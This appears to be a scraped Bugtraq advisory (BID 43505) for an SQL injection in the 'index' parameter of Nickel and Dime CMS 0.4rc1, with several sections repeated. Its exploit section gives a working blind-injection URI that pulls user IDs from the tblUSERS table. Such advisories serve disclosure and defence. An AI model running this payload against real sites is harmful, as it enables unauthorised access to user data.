Nickel and Dime CMS 'index' Parameter SQL Injection Vulnerability
BID:43505
Info
Nickel and Dime CMS 'index' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 43505 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 27 2010 12:00AM |
| Updated: | Sep 27 2010 12:00AM |
| Credit: | Abysssec |
| Vulnerable: |
Nickel and Dime CMS ndCMS 0.4rc1 |
| Not Vulnerable: | |
Discussion
Nickel and Dime CMS 'index' Parameter SQL Injection Vulnerability
Nickel and Dime CMS (ndCMS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ndCMS 0.4rc1 is vulnerable; other versions may also be affected.
Nickel and Dime CMS (ndCMS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ndCMS 0.4rc1 is vulnerable; other versions may also be affected.
Exploit / POC
Nickel and Dime CMS 'index' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/express_edit/editor.aspx?index=1+AND+1=IIF((select mid(last(userid),1,1) from (select top 1 userid from tblUSERS))='a',1,2)
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/express_edit/editor.aspx?index=1+AND+1=IIF((select mid(last(userid),1,1) from (select top 1 userid from tblUSERS))='a',1,2)
Solution / Fix
Nickel and Dime CMS 'index' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Nickel and Dime CMS 'index' Parameter SQL Injection Vulnerability
References:
References:
- Nickel and Dime CMS Homepage (Nickel and Dime CMS)